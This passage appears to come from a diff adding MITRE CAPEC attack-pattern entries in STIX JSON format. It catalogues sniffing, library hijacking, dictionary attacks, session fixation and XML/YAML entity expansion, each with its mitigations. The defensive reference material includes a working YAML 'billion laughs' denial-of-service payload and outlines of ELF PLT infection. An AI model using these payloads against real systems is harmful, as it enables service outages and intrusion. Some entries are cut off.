Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Sniffing Network Traffic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c9b31907-c466-4325-af55-c418aea8b964" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + 
"Software" + ], + "x_capec_prerequisites": [ + "The target must be communicating on a network protocol visible by a network sniffing application.", + "The adversary must obtain a logical position on the network from intercepting target network traffic is possible. Depending on the network topology, traffic sniffing may be simple or challenging. If both the target sender and target recipient are members of a single subnet, the adversary must also be on that subnet in order to see their traffic communication." + ], + "x_capec_resources_required": [ + "A tool with the capability of presenting network communication traffic (e.g., Wireshark, tcpdump, Cain and Abel, etc.)." + ], + "x_capec_skills_required": { + "Low": "Adversaries can obtain and set up open-source network sniffing tools easily." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Obfuscate network traffic through encryption to prevent its readability by network sniffers.", + "id": "course-of-action--26edfe3d-53cd-4d09-abbf-84ee7c48236f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-158-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28658fd8-29a0-4a6b-b8a9-d7a967352c4e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26edfe3d-53cd-4d09-abbf-84ee7c48236f", + "spec_version": "2.1", + "target_ref": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ appropriate levels of segmentation to your network in accordance with best practices.", + "id": "course-of-action--3ca8bdc8-6a37-4294-acfe-2e658e9e0fe6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-158-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1c000a2-67f9-4572-af06-6707542d5784", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ca8bdc8-6a37-4294-acfe-2e658e9e0fe6", + "spec_version": "2.1", + "target_ref": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application's attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. 
This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.", + "external_references": [ + { + "external_id": "CAPEC-159", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/159.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "Hijack Execution Flow:Path Interception by Search Order Hijacking", + "external_id": "T1574.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/008" + }, + { + "description": "Silvio Cesare, Share Library Call Redirection Via ELF PLT Infection (Issue 56), Phrack Magazine, 2000", + "external_id": "REF-29", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/56/7.html" + }, + { + "description": "OWASP Top 10 2007 (2007), The Open Web Application Security Project (OWASP)", + "external_id": "REF-30", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-pdf-archive/OWASP_Top_10_2007.pdf" + } + ], + "id": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Redirect Access to Libraries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + 
"x_capec_example_instances": [ + "In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... • mark the text segment writeable • save the PLT(GOT) entry • replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... • do the payload of the new lib call • restore the original PLT(GOT) entry • call the lib call • save the PLT(GOT) entry again (if its changed) • replace the PLT(GOT) entry with the address of the new lib call" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: The adversary identifies the target application and determines what libraries are being used.

  2. Techniques
    Find public source code and identify library dependencies.
    Gain access to the system hosting the application and look for libraries in common locations.

Experiment

  1. Deploy Malicious Libraries: The adversary crafts malicious libraries and deploys them on the system where the application is running, or in a remote location that can be loaded by the application.

Exploit

  1. Redirect Library Calls to Malicious Library: Once the malicious library crafted by the adversary is deployed, the adversary will manipulate the flow of the application such that it calls the malicious library. This can be done in a variety of ways based on how the application is loading and calling libraries.

  2. Techniques
    Poison the DNS cache of the system so that it loads a malicious library from a remote location hosted by the adversary instead of the legitimate location
    Create a symlink that tricks the application into thinking that a malicious library is the legitimate library.
    Use DLL side-loading to place a malicious verison of a DLL in the windows directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328" + ], + "x_capec_prerequisites": [ + "The target must utilize external libraries and must fail to verify the integrity of these libraries before using them." + ], + "x_capec_skills_required": { + "High": "To reverse engineering the libraries and inject malicious code into the libraries", + "Low": "To modify the entries in the configuration file pointing to malicious libraries", + "Medium": "To force symlink and timing issues for redirecting access to libraries" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Restrict the permission to modify the entries in the configuration file.", + "id": "course-of-action--f26a4acf-baf0-4bf2-a143-bc1b7c62e85f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd6337df-a7bd-4afe-b168-4189a828cafb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f26a4acf-baf0-4bf2-a143-bc1b7c62e85f", + "spec_version": "2.1", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Check the integrity of the dynamically linked libraries before use them.", + "id": "course-of-action--3654cbd2-7f0f-4ca2-8104-ac4038549426", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34ed3417-5e22-490d-b967-b77e3be13f50", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3654cbd2-7f0f-4ca2-8104-ac4038549426", + "spec_version": "2.1", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries.", + "id": "course-of-action--3b7c420e-04b7-4432-90f3-cdcec1a162cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--915e2bb6-c5cc-4d8c-b3f9-062b7c13ead4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", 
+ "source_ref": "course-of-action--3b7c420e-04b7-4432-90f3-cdcec1a162cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.\n ", + "external_references": [ + { + "external_id": "CAPEC-16", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/16.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + } + ], + "id": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "modified": 
"2020-12-17T00:00:00.000Z", + "name": "Dictionary-based Password Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A system user selects the word \"treacherous\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.", + "\n The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.\n Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.\n Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. 
The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.See also: CVE-2003-1096" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
  3. Select dictionaries: Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)

  4. Techniques
    Select dictionary based on particular users' preferred languages.
    Select dictionary based on the application/system's supported languages.
  5. Determine username(s) to target: Determine username(s) whose passwords to crack.

  6. Techniques
    Obtain username(s) by sniffing network packets.
    Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)
    Obtain usernames from filesystem (e.g. list of directories in C:\\Documents and Settings\\ in Windows, and list in /etc/passwd in UNIX-like systems)

Exploit

  1. Use dictionary to crack passwords.: Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.

  2. Techniques
    Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).
    Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s).
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.", + "The system does not have a sound password policy that is being enforced.", + "The system does not implement an effective password throttling mechanism." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools and dictionaries are available to launch this type of an attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Create a strong password policy and ensure that your system enforces this policy.", + "id": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.", + "id": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e58b5f0-7d1d-48bc-bbfd-a15472142005", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services.", + "id": "course-of-action--4e15baee-dc2c-4af0-bad4-f2a1fd8a7000", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--21bb6f85-66f5-41e1-b24b-9ad75b3f1526", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--4e15baee-dc2c-4af0-bad4-f2a1fd8a7000", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support \n A similar example uses session ID as an argument of the URL.\n http://www.example.com/index.php/sessionid=0123456789\n Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Analyze and Understand Session IDs: The attacker finds that the targeted application use session credentials to identify legitimate users.

  2. Techniques
    An attacker makes many anonymous connections and records the session IDs.
    An attacker makes authorized connections and records the session tokens or credentials.

Experiment

  1. Create Session IDs.: Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies.

  2. Techniques
    The attacker manipulates the HTTP request message and adds their forged session IDs in to the requests or cookies.

Exploit

  1. Abuse the Victim's Session Credentials: The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier.

  2. Techniques
    The attacker loads the predefined or predicted session ID into their browser and browses to protected data or functionality.
    The attacker loads the predefined or predicted session ID into their software and utilizes functionality with the rights of the victim.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810" + ], + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers." + ], + "x_capec_resources_required": [ + "Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "Medium": "Forge the session credential and reply the request." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. 
By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "id": "course-of-action--aba24572-8817-4d88-92bf-765eaa6ae508", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-196-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7fe664e-53db-4afa-acf9-45a9386c846a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aba24572-8817-4d88-92bf-765eaa6ae508", + "spec_version": "2.1", + "target_ref": "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "id": "course-of-action--9403f5e9-5529-4e19-8b52-23c80494dc87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-196-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7122b06c-8e94-4304-88f8-5f9d5c620b25", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9403f5e9-5529-4e19-8b52-23c80494dc87", + "spec_version": "2.1", + "target_ref": "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.", + "external_references": [ + { + "external_id": "CAPEC-197", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/197.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-776", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/776.html" + }, + { + "description": "XML Entity Expansion", + "external_id": "44", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Entity-Expansion" + }, + { + "description": "Amit Klein, Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD", + "external_id": "REF-64", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/archive/1/303509" + }, + { + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "external_id": "REF-65", + "source_name": "reference_from_CAPEC", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf" + }, + { + 
"description": "Elliotte Rusty Harold, Tip: Configure SAX parsers for secure processing, IBM developerWorks, 2005--05---27, IBM", + "external_id": "REF-66", + "source_name": "reference_from_CAPEC", + "url": "http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html" + }, + { + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "external_id": "REF-67", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx" + }, + { + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "external_id": "REF-67", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx" + } + ], + "id": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exponential Data Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Billion Laughs Attack", + "XML Bomb", + "XML Entity Expansion (XEE)" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The most common example of this type of attack is the \"many laughs\" attack (sometimes called the 'billion laughs' attack). For example:\n \n ]>&lol9;\n This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. 
A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow.\n ", + "\n This example is similar, but uses YAML. This was used to attack Kubernetes [REF-686]\n a: &a [\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\"]b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using subsitituion on the victim's side.

  2. Techniques
    Use an automated tool to record all instances of URLs to process requests.
    Use a browser to manually explore the website and analyze how the application processes requests.

Experiment

  1. Craft malicious payload: The adversary crafts a malicious message containing nested exponential expansion that completely uses up available server resources. See the \"Example Instances\" section for details on how to craft this malicious payload.

Exploit

  1. Send the message: Send the malicious crafted message to the target URL.

